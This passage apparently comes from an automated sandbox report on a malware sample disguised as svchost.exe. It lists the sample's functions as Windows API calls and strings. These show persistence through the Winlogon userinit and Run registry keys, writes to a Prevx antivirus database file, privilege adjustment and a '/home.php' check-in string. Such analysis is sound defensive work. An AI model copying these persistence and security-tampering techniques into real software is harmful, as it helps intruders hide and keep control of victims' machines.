                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              • Opcode ID: aede83505e8d44f8117a41c26d50cffa2a2c4476b5e62eb1221b70c179ba2898
                                                                                                                                                                                                              • Instruction ID: 8194cb50291c09a0a497e8bdfc8e0a714812a0484c3c6313a72422a7f10420cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aede83505e8d44f8117a41c26d50cffa2a2c4476b5e62eb1221b70c179ba2898
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD512AB29401287FDB249E749C98EEFBF7CEB44740F444A99F942D6340EB758D948BA0
                                                                                                                                                                                                              Function 0265A1B0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 130filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 0265A1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 0265A1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0265A1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 0265A23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265A256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265A267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0265A279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 0265A291
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0265A2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 0265A327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265A334
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%31%34%31%37%30%30%21%45%45%41%30%30%46%41%34$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-645231788
                                                                                                                                                                                                              • Opcode ID: c2cfc78bf8ebbddfe578eed1149dd37ad5d44d2468cf441e3f946de9d75e2f01
                                                                                                                                                                                                              • Instruction ID: c61c80934eaaaf67d836deac9e8b9dff7181b08c263fcb68c49ceaa3703d83d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2cfc78bf8ebbddfe578eed1149dd37ad5d44d2468cf441e3f946de9d75e2f01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41A771A802187BEB14DB90CC99FFD777D9B44700F504694BA06E6180EBB19EC4CB64
                                                                                                                                                                                                              Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              Function 02643300 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02643325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02643344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02643351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 0264336E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643389
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 026433A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 026433DE
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 026433FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0264340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 026433B4, 026433EB
                                                                                                                                                                                                              • userinit, xrefs: 026433F6
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 026433D4
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 0264339D
                                                                                                                                                                                                              • SystemDrive, xrefs: 0264333F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3780845138-4271125494
                                                                                                                                                                                                              • Opcode ID: 6c0e29c06c448da27904e7ceb4ec7309aa1ea5901e8af449ae29754bdbc85792
                                                                                                                                                                                                              • Instruction ID: 4747619bf2acc29bc8a5860313919fd323a9515cd9677063cca9127f9645a4dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c0e29c06c448da27904e7ceb4ec7309aa1ea5901e8af449ae29754bdbc85792
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B210175A80308FBFB14DB90CC8AFEE777CEB44B04F914688B606A6180DBF55654CB61
                                                                                                                                                                                                              Function 026474A0 Relevance: 24.1, APIs: 16, Instructions: 142memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647527
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026475A8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026475AF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026475CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026475E0
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 026475F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2214028410-0
                                                                                                                                                                                                              • Opcode ID: 0644518bee898d8627ae1ffc60655f4b74c67c73455393a8c9f2086db50f09a1
                                                                                                                                                                                                              • Instruction ID: c67bdc739f7895eddad571030203f4cc7b7abbee147f12e7cac630eec18966f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0644518bee898d8627ae1ffc60655f4b74c67c73455393a8c9f2086db50f09a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341B371A40304BBDB219FA59C88FAFBB7CEB44711F518618FA56EA280DF749540CBA0
                                                                                                                                                                                                              Function 02647350 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 125fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,76F8F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0264738D
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 026473B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 026473D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 026473EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 026473F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000), ref: 0264740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 0264744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0264746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 2b437ed62d6bee6d16408ed642f5f95fc7633b3e8be49bcb11960b061d72eef9
                                                                                                                                                                                                              • Instruction ID: 6356a449f25186e4d705621c0eb519da11c3f01105d556c20839598ab3fc02dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b437ed62d6bee6d16408ed642f5f95fc7633b3e8be49bcb11960b061d72eef9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441E875A80208BBE7118E64DC89FFEBBACEF44754F518115FE45DA2C0DB709940C7A1
                                                                                                                                                                                                              Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              Function 02665680 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026656A6
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76F90F00), ref: 026656B7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026656C0
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 026656CF
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 026656D8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026656F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02665709
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 0266572A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 0266574C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 02665758
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 02665766
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: 38a899e39fd4286b1ec3647ef067b76971f3433be1879c5cf626af0865a802ad
                                                                                                                                                                                                              • Instruction ID: cc9cb1bfcb1c9b117bc79b361c7b7b44feb385af0c3f0b93b656b55632c82b5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38a899e39fd4286b1ec3647ef067b76971f3433be1879c5cf626af0865a802ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B21BA71D41114FBD720AAA8EC8DFBE7BA8EB45324F950355E946D3280EB30DD45CBA0
                                                                                                                                                                                                              Function 02647728 Relevance: 19.6, APIs: 13, Instructions: 140memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026477DE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026477E5
                                                                                                                                                                                                              • memset.MSVCRT ref: 026477F9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,026645C4,00000104), ref: 02647808
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000), ref: 0264780F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647883
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02647886
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647893
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02647896
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 296989886-0
                                                                                                                                                                                                              • Opcode ID: fa721572f29db3cf3ad7592add9e93c4c0a8d0ad616371f0ef7b9d1f91422fcf
                                                                                                                                                                                                              • Instruction ID: eba9fb4c68e756b562a643a6072b185eb6ba898c6657d158305be269b1b6b3fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa721572f29db3cf3ad7592add9e93c4c0a8d0ad616371f0ef7b9d1f91422fcf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E41F9719083469BCB229F309CD9FBBBFAAAF41244F495954E9C287241EF22D409C791
                                                                                                                                                                                                              Function 02646C70 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
